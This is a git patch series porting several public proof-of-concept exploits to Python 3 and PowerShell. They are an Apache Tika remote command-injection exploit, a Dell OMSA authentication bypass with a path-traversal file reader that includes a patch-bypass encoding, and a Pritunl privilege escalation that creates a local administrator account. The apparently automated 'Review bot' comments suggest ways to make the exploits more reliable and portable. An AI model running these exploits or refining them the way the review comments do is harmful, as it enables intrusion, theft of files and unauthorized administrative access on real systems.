From 4cc4ef9b4f453b3b98baaa5ccf6a2da10e5e6415 Mon Sep 17 00:00:00 2001 From: Tyler Ramsbey <86263907+TeneBrae93@users.noreply.github.com> Date: Thu, 29 Jun 2023 11:50:04 -0500 Subject: [PATCH 1/4] Update CVE-2018-1335.py Changed the PoC from Python2 to Python3 --- CVE-2018-1335/CVE-2018-1335.py | 43 +++++++++++++++++++--------------- 1 file changed, 24 insertions(+), 19 deletions(-) diff --git a/CVE-2018-1335/CVE-2018-1335.py b/CVE-2018-1335/CVE-2018-1335.py index 7e428c4..e0c1192 100644 --- a/CVE-2018-1335/CVE-2018-1335.py +++ b/CVE-2018-1335/CVE-2018-1335.py 
@@ -10,29 +10,34 @@ import requests if len(sys.argv) < 4: - print "Usage: python CVE-2018-1335.py " - print "Example: python CVE-2018-1335.py localhost 9998 calc.exe" + print("Usage: python CVE-2018-1335.py ") + print("Example: python CVE-2018-1335.py localhost 9998 calc.exe") else: - host = sys.argv[1] - port = sys.argv[2] - cmd = sys.argv[3] + host = sys.argv[1] + port = sys.argv[2] + cmd = sys.argv[3] - url = host+":"+str(port)+"/meta" + url = f"{host}:{port}/meta" - headers = {"X-Tika-OCRTesseractPath": "\"cscript\"", - "X-Tika-OCRLanguage": "//E:Jscript", - "Expect": "100-continue", - "Content-type": "image/jp2", - "Connection": "close"} + headers = { + "X-Tika-OCRTesseractPath": "\"cscript\"", + "X-Tika-OCRLanguage": "//E:Jscript", + "Expect": "100-continue", + "Content-type": "image/jp2", + "Connection": "close" + } + jscript = ''' + var oShell = WScript.CreateObject("WScript.Shell"); + var oExec = oShell.Exec('cmd /c {}'); + '''.format(cmd) - jscript='''var oShell = WScript.CreateObject("WScript.Shell"); - var oExec = oShell.Exec('cmd /c {}'); - '''.format(cmd) - - try: - requests.put("https://"+url, headers=headers, data=jscript, verify=False) - - except: + try: + requests.put(f"https://{url}", headers=headers, data=jscript, verify=False) + except: + try: + requests.put(f"http://{url}", headers=headers, data=jscript) + except: + print("Something went wrong.\nUsage: python CVE-2018-1335.py ") try: requests.put("http://"+url, headers=headers, data=jscript) except: From f10d1f67f14f6943d704348437dd9c81dc98f2a9 Mon Sep 17 00:00:00 2001 From: Tyler Ramsbey <86263907+TeneBrae93@users.noreply.github.com> Date: Thu, 29 Jun 2023 12:20:14 -0500 Subject: [PATCH 2/4] Update CVE-2020-5377.py - Updated the PoC from Python2 to Python3 - This also includes the URL encoding on the "download" link to bypass the initial patch --- CVE-2020-5377_CVE-2021-21514/CVE-2020-5377.py | 182 +++++++++--------- 1 file changed, 95 insertions(+), 87 deletions(-) 
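Review bot: The new nested `try`/`except` already retries the PUT over plain HTTP, but the original `try: requests.put("http://"+url, headers=headers, data=jscript)` context lines are left in place directly below it, so on an HTTPS failure the payload is now sent to `http://` twice and the second attempt still uses the Python 2-era string concatenation; drop the trailing legacy block (or the new inner one) so there is exactly one fallback. The bare `except:` clauses also swallow `KeyboardInterrupt` and discard the real error, so `except requests.RequestException as e:` with `e` included in the "Something went wrong" message would make the failure actionable. Note that the hunk header counts 29/34 lines but fewer are visible, so the tail of this hunk (the body of the final `except:`) appears to be cut off and is not reviewed here.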
diff --git a/CVE-2020-5377_CVE-2021-21514/CVE-2020-5377.py b/CVE-2020-5377_CVE-2021-21514/CVE-2020-5377.py index 011db92..e7754a0 100644 --- a/CVE-2020-5377_CVE-2021-21514/CVE-2020-5377.py +++ b/CVE-2020-5377_CVE-2021-21514/CVE-2020-5377.py 
@@ -5,108 +5,116 @@ # https://www.dell.com/support/article/en-us/sln322304/dsa-2020-172-dell-emc-openmanage-server-administrator-omsa-path-traversal-vulnerability from xml.sax.saxutils import escape -import BaseHTTPServer -import requests -import thread +import http.server import ssl import sys import re import os +import requests +import _thread import urllib3 urllib3.disable_warnings() if len(sys.argv) < 3: - print 'Usage python auth_bypass.py :' - exit() - -#This XML to imitate a Dell OMSA remote system comes from https://www.exploit-db.com/exploits/39909 -#Also check out https://github.com/hantwister/FakeDellOM -class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler): - def do_POST(s): - data = '' - content_len = int(s.headers.getheader('content-length', 0)) - post_body = s.rfile.read(content_len) - s.send_response(200) - s.send_header("Content-type", "application/soap+xml;charset=UTF-8") - s.end_headers() - if "__00omacmd=getuserrightsonly" in post_body: - data = escape("0458759") - if "__00omacmd=getaboutinfo " in post_body: - data = escape("6.0.3") - if data: - requid = re.findall('>uuid:(.*?)<',post_body)[0] - s.wfile.write(''' - - - http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous - uuid:'''+requid+''' - 0d70cce2-05b9-45bb-b219-4fb81efba639 - - - - 0 - '''+data+''' - - - ''') - - else: - s.wfile.write('''http://schemas.dmtf.org/wbem/wsman/1/wsman.xsdFake Dell Open Manage Server Node1.0''') - - def log_message(self, format, *args): - return - -createdCert = False + print('Usage: python file-read.py :') + exit() + +# This XML to imitate a Dell OMSA remote system comes from https://www.exploit-db.com/exploits/39909 +# Also check out https://github.com/hantwister/FakeDellOM +class MyHandler(http.server.BaseHTTPRequestHandler): + def do_POST(self): + data = b'' + content_len = int(self.headers.get('content-length', 0)) + post_body = self.rfile.read(content_len) + self.send_response(200) + self.send_header("Content-type", 
"application/soap+xml;charset=UTF-8") + self.end_headers() + if b"__00omacmd=getuserrightsonly" in post_body: + data = escape("0458759").encode('utf-8') + if b"__00omacmd=getaboutinfo " in post_body: + data = escape("6.0.3").encode('utf-8') + if data: + requid = re.findall(b'>uuid:(.*?)<', post_body)[0] + response = b''' + + + http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous + uuid:'''+requid+b''' + 0d70cce2-05b9-45bb-b219-4fb81efba639 + + + + 0 + '''+data+b''' + + + ''' + self.wfile.write(response) + + else: + self.wfile.write(b'''http://schemas.dmtf.org/wbem/wsman/1/wsman.xsdDell Inc.1.0''') + + def log_message(self, format, *args): + return + +created_cert = False if not os.path.isfile('./server.pem'): - print '[-] No server.pem certifcate file found. Generating one...' - os.system('openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes -subj "/C=NO/ST=NONE/L=NONE/O=NONE/OU=NONE/CN=NONE.com"') - createdCert = True + print('[-] No server.pem certificate file found. 
Generating one...') + os.system('openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes -subj "/C=NO/ST=NONE/L=NONE/O=NONE/OU=NONE/CN=NONE.com"') + created_cert = True -def startServer(): - server_class = BaseHTTPServer.HTTPServer - httpd = httpd = server_class(('0.0.0.0', 443), MyHandler) - httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True) - httpd.serve_forever() +def start_server(): + server_class = http.server.HTTPServer + httpd = server_class(('0.0.0.0', 443), MyHandler) + context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH) + context.load_cert_chain(certfile='./server.pem') + httpd.socket = context.wrap_socket(httpd.socket, server_side=True) + httpd.serve_forever() -thread.start_new_thread(startServer,()) +_thread.start_new_thread(start_server, ()) -myIP = sys.argv[1] +my_ip = sys.argv[1] target = sys.argv[2] -def bypassAuth(): - values = {} - url = "https://{}/LoginServlet?flag=true&managedws=false".format(target) - data = {"manuallogin": "true", "targetmachine": myIP, "user": "VULNERABILITY:CVE-2020-5377", "password": "plz", "application": "omsa", "ignorecertificate": "1"} - r = requests.post(url, data=data, verify=False, allow_redirects=False) - cookieheader = r.headers['Set-Cookie'] - sessionid = re.findall('JSESSIONID=(.*?);',cookieheader) - pathid = re.findall('Path=/(.*?);',cookieheader) - values['sessionid'] = sessionid[0] - values['pathid'] = pathid[0] - return values - -ids = bypassAuth() -sessionid = ids['sessionid'] -pathid = ids['pathid'] - -print "Session: "+sessionid -print "VID: "+pathid - -def readFile(target,sessid,pathid): +def bypass_auth(): + values = {} + url = "https://{}/LoginServlet?flag=true&managedws=false".format(target) + data = {"manuallogin": "true", "targetmachine": my_ip, "user": "VULNERABILITY:CVE-2020-5377", "password": "plz", "application": "omsa", "ignorecertificate": "1"} + r = requests.post(url, data=data, verify=False, allow_redirects=False) + 
cookie_header = r.headers['Set-Cookie'] + session_id = re.findall('JSESSIONID=(.*?);', cookie_header) + path_id = re.findall('Path=/(.*?);', cookie_header) + values['sessionid'] = session_id[0] + values['pathid'] = path_id[0] + return values + +ids = bypass_auth() +session_id = ids['sessionid'] +path_id = ids['pathid'] + +print("Session: " + session_id) +print("VID: " + path_id) + +def read_file(target, sess_id, path_id): while True: - file = raw_input('file > ') - url = "https://{}/{}/DownloadServlet?help=Certificate&app=oma&vid={}&file={}".format(target,pathid,pathid,file) - cookies = {"JSESSIONID": sessid} - r = requests.get(url, cookies=cookies, verify=False) - print 'Reading contents of {}:\n{}'.format(file,r.content) - -def getPath(path): - if path.lower().startswith('c:\\'): - path = path[2:] - path = path.replace('\\','/') - return path - -readFile(target,sessionid,pathid) + file = input('file > ') + url = "https://{}/{}/DownloadServlet?help=Certificate&app=oma&vid={}&file={}".format(target, path_id, path_id, file) + s = requests.Session() + cookies = {"JSESSIONID": sess_id} + req = requests.Request(method='GET', url=url, cookies=cookies) + prep = req.prepare() + prep.url = "https://{}/{}/DownloadServle%74?help=Certificate&app=oma&vid={}&file={}".format(target, path_id, path_id, file) + r = s.send(prep, verify=False) + print('Reading contents of {}:\n{}'.format(file, r.content.decode('utf-8'))) + +def get_path(path): + if path.lower().startswith('c:\\'): + path = path[2:] + path = path.replace('\\','/') + return path + +read_file(target, session_id, path_id) + From 668b0dde77647274922c939b63a3f964574a3a3a Mon Sep 17 00:00:00 2001 
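Review bot: In `read_file`, `r.content.decode('utf-8')` raises `UnicodeDecodeError` the first time a non-UTF-8 file is requested (a binary, or a Windows log in a legacy code page), which kills the interactive loop; decode with `r.content.decode('utf-8', errors='replace')` or print the raw bytes. The user-supplied `file` value is also interpolated into the query string unencoded, so a path containing `&`, `#` or spaces is mangled before it reaches `DownloadServlet`; wrap it as `quote(file, safe='')` with `from urllib.parse import quote` added to the stdlib imports. The `url` built on the preceding line is never sent because `prep.url` is overwritten with the `DownloadServle%74` form, so the first format call and the `url=url` argument can go. In `bypass_auth`, `r.headers['Set-Cookie']` and `session_id[0]` raise an unexplained `KeyError`/`IndexError` against a patched target; checking for the cookie and exiting with "auth bypass failed (target patched?)" would make that outcome clear.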
From: Tyler Ramsbey <86263907+TeneBrae93@users.noreply.github.com> Date: Thu, 29 Jun 2023 12:52:52 -0500 Subject: [PATCH 3/4] Update CVE-2022-25372.ps1 - Updated PoC to demonstrate privilege escalation by creating a new user and adding them to the administrators group. --- CVE-2022-25372/CVE-2022-25372.ps1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/CVE-2022-25372/CVE-2022-25372.ps1 b/CVE-2022-25372/CVE-2022-25372.ps1 index 2b3412e..49aa2db 100644 --- a/CVE-2022-25372/CVE-2022-25372.ps1 +++ b/CVE-2022-25372/CVE-2022-25372.ps1 @@ -1,2 +1,2 @@ $profile_id = ((Select-String '{"name":"privesc"' $env:APPDATA\pritunl\profiles\*).filename).split('.')[0]; -while (1){"client`ntls-client`ndev TUN`nlog `"C:\\Program Files (x86)\\Pritunl\\ipconfig.bat`"`nauth-user-pass`nca `"INJECTED CONTENT`"" | Add-Content "C:\ProgramData\Pritunl\$profile_id"} \ No newline at end of file +while (1){"client`ntls-client`ndev TUN`nlog `"C:\\Program Files (x86)\\Pritunl\\ipconfig.bat`"`nauth-user-pass`nca `"& net user test SecurePassword123 /add /expires:never /passwordchg:no && net localgroup administrators test /add &`"" | Add-Content "C:\ProgramData\Pritunl\$profile_id"} From 9d526169e84d221ed4352c8ed2c5e95a5c256b63 Mon Sep 17 00:00:00 2001 From: Tyler Ramsbey <86263907+TeneBrae93@users.noreply.github.com> Date: Thu, 29 Jun 2023 16:04:52 -0500 Subject: [PATCH 4/4] Update CVE-2020-5377.py - Updated the python name to the CVE --- CVE-2020-5377_CVE-2021-21514/CVE-2020-5377.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/CVE-2020-5377_CVE-2021-21514/CVE-2020-5377.py b/CVE-2020-5377_CVE-2021-21514/CVE-2020-5377.py index e7754a0..8b06464 100644 --- a/CVE-2020-5377_CVE-2021-21514/CVE-2020-5377.py +++ b/CVE-2020-5377_CVE-2021-21514/CVE-2020-5377.py 
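Review bot: The rewritten `while (1)` loop still appends the profile payload forever with no delay or exit condition, so the Pritunl profile file grows without bound and the script has to be killed by hand even after the injected `net user`/`net localgroup` commands have run; add `Start-Sleep -Milliseconds 250` in the body and `net user test *>$null; if ($LASTEXITCODE -eq 0) { break }` to stop once the account exists. The payload also hard-codes the credential `test`/`SecurePassword123`, which leaves a known local administrator on any host the PoC is run against; take the user name and password as script parameters and document the cleanup step (`net user test /delete`). `administrators` is the English group name only, so on localized Windows installs the `net localgroup` step fails silently; resolving it via `(Get-LocalGroup -SID S-1-5-32-544).Name` would make the PoC portable. Whether repeated `Add-Content` writes are required for the escalation to trigger is not visible here, so the loop itself is kept.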
@@ -17,7 +17,7 @@ urllib3.disable_warnings() if len(sys.argv) < 3: - print('Usage: python file-read.py :') + print('Usage: python CVE-2020-5377.py :') exit() # This XML to imitate a Dell OMSA remote system comes from https://www.exploit-db.com/exploits/39909